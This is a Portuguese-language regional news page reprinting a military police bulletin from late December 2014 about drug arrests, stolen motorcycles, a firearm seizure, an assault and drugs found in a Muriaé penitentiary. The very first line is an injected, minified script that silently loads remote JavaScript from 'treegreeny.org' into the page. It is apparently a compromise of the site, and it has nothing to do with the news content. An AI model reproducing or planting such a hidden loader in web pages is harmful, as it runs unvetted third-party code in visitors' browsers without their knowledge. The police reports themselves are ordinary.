;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais - Carangola e Região -29/12/14. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais – Carangola e Região -29/12/14.

pmOCORRÊNCIAS DE DESTAQUE MURIAÉ – 29/12/2014
76ª CIA PM – MURIAÉ-MG
PM EFETUA PRISÃO POR TRÁFICO DE DROGAS NO DISTRITO DE VERMELHO – MURIAÉ

Em 26/12/2014, por volta das 08h15min, na Rua Tereza Garcia, no distrito de Vermelho, após denúncia via 190, militares deslocaram ao local e fizeram contato com E.M.V.S., de 38 anos, e durante buscas no imóvel foi localizado no forro de PVC, uma sacola contendo dois tabletes grandes de cocaína. O cidadão disse que L.F.R., de 23 anos, lhe pediu para guardar a droga em sua residência. Em contato com LUIDI, este confirmou a propriedade droga. Autores presos e encaminhados à DPJ.

PM RECUPERA VEÍCULO FURTADO E PRENDE AUTOR EM BARÃO DO MONTE ALTO

Em 26/12/2014, por volta das 18h, na estrada Beco da Serra, zona rural de Barão de Monte Alto, militares abordaram o nacional W.S.D.“N.”, de 20 anos, conduzindo uma motocicleta HONDA/FAN 125, cor preta placa de PALMA MG. Após consulta no sistema informatizado, constatou que era produto de furto. Diante dos fatos, o veículo foi apreendido e guinchado para pátio credenciado e autor preso e conduzido para DPJ.

PM APREENDE MENOR E PRENDE AUTOR POR POSSE ILEGAL DE ARMA DE FOGO EM MIRADOURO

Em 26/12/2014, por volta das 16h, na Rua Principal, distrito de Varginha, militares, após receberem denúncia que G.R.A., de 16 anos, havia furtado uma garrucha calibre 38 e uma garrucha calibre 32 de J.R., de 70 anos, deslocaram até a sua residência onde se fazia presente sua amásia D.K., de 16 anos, e localizaram uma espingarda de fabricação artesanal sem marca e 03 cápsulas calibre 38 deflagradas. O idoso que, segundo ele próprio, é barganhista de armas disse que a espingarda não é de sua propriedade, porém em sua residência foram localizadas 22 cápsulas deflagradas de calibres diversos. Diante do exposto, os materiais foram recolhidos, a menor apreendida e idoso preso, sendo conduzidos à DPJ.

PM EFETUA PRISÃO E APREENDE GRANDE QUANTIDADE DE MATERIAL USADO NO TRÁFICO DE DROGAS EM PATROCÍNIO DO MURIAÉ

Em 26/12/2014, por volta das 10h, na Rua Vereador Lincoln Cortes Campos, no Centro, militares abordaram o veículo VW SANTANA, conduzido por A.F.B., de 71 anos, e durante busca na residência do mesmo foram localizados três balanças de precisão, 16 papelotes de cocaína, um tablete de 270 gramas da mesma droga, fermento em pó para misturar com a droga, diversos aparelhos celulares e vários relógios, sete pássaros da fauna silvestre, sem registro e R$ 9.592,00. Diante dos fatos, o veículo foi guinchado para pátio credenciado, os materiais recolhidos. A Sra. S.G.P.F., de 67 anos, que guardava os produtos foi presa e conduzida para DPJ, junto com autor.

PM REGISTRA DENÚNCIA DE AGENTE PENITENCIÁRIO DE USO E TRÁFICO DE DROGAS EM PENITENCIÁRIA DE MURIAÉ

Em 26/12/2014, por volta das 12h, na Avenida Luciano Rodrigues Paula, no Bairro Leblon, militares compareceram na Penitenciária Dr. MANOEL MARTINS LISBOA JÚNIOR, onde em contato com o Agente Penitenciário R.S.C., este informou que o detento J.A.O., de 21 anos, tentava com o uso de uma corda, transportar duas buchas de maconha para cela do detento F.C.O.A., de 27 anos e, após buscas na cela, onde estava o primeiro, foram localizadas mais 31 buchas da mesma substância, este ainda ameaçou o Agente. A droga foi apreendida. Aos autores foi dada voz de prisão em flagrante, os quais permaneceram na penitenciária.

PM EFETUA PRISÃO DE AUTOR POR LESÃO CORPORAL QUE RESULTOU EM GRAVES FERIMENTOS DA VÍTIMA EM MURIAÉ

Em 27/12/2014, por volta das 15h45min, na Praça João Pinheiro, no Centro, militares compareceram ao local onde J.H.S.“T.”, de 32 anos, foi agredido com golpes de madeira na face e crânio, desferidos por M.C.S.“M.”, de 37 anos. A vítima foi socorrida pelo CBMMG ao HSP e, após atendimento, permaneceu internada devido as sérias lesões, sendo necessário inclusive entubar a vítima para liberar as vias respiratórias. Durante a ocorrência, foi constatado que existe mandado de prisão em desfavor da vítima. O autor foi preso e conduzido à DPJ, junto com a arma branca utilizada no crime, onde teve sua prisão
ratificada por homicídio tentado.

PM LOCALIZA MAIS UM VEÍCULO FURTADO EM MURIAÉ

Em 27/12/2014, por volta das 19h45min, na Rua Francisco Luciano Moreira, no Bairro Aeroporto, após informações de que V.L.M.S.“T.”, de 23 anos, estava transitando em uma motocicleta HONDA CG VERMELHA roubada, e abandonou o veículo deixando o bairro na garupa de outra motocicleta de cor preta, tomando rumo ignorado. Militares localizaram a motocicleta CG TITAN SPORT, cor vermelha, a qual estava com o selo de segurança rompido, e, em consulta ao sistema, foi constatado através do CHASSI que a moto foi furtada dia 14/12/14. O autor não foi localizado e o veículo foi removido ao pátio credenciado.

75ª CIA PM – CARANGOLA-MG

PM LOCALIZA VEÍCULO FURTADO NAS MARGENS DO RIO CARANGOLA – EM CARANGOLA

Em 27/12/2014, por volta das 09h20min, na Rua Justino Frossard, na Varginha, militares localizaram uma motocicleta HONDA CG TITAN, vermelha, com numeração do chassi e motor raspados, jogada às margens do RIO CARANGOLA. O veículo estava com a placa de IBATIBA-ES, sendo esta de uma motocicleta KASINSKI, cor preta. Condutor não foi localizado e o veículo foi removido ao pátio credenciado.

PM EFETUA PRISÃO DE DOIS HOMENS POR RFECEPTAÇÃO DE VEÍCULOS ROUBADOS EM CARANGOLA

Em 28/12/2014, por volta de 01h50min, na Av. Cap. Antônio Carlos de Souza, no Santa Maria, militares em visita preventiva no POSTO TREVO D’ÁGUA, abordaram V.A., de 36 anos, condutor da motocicleta HONDA CG 125 FAN, cor preta, de ANTONIO PRADO DE MINAS – MG, sendo constatado que o veículo consta como roubado. O cidadão disse que adquiriu a motocicleta acerca de sete anos de seu primo, residente no município de MIRADOURO, e desconhecia que a motocicleta era produto de crime. O autor não apresentou documentos de porte obrigatório do veículo, que foi removido ao pátio credenciado. Este foi preso e conduzido à DPJ.
Na mesma data, por volta das 23h55min, na Avenida Juca de Souza, na Varginha, militares abordaram G.F.S., de 37 anos, conduzindo a motocicleta HONDA BIZ, cor amarela, de CAMPOS DOS GOYTACAZES-RJ, a qual apresentou queixa de furto / roubo. Foi dada voz de prisão ao autor, que relatou ter adquirido o veículo de um indivíduo conhecido por “T.M.” pelo valor de R$1.200,00; na localidade de SÃO PEDRO DE RATES-ES. Veículo apreendido e autor conduzido à DPJ.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM
RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA
MURIAÉ / MG
TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.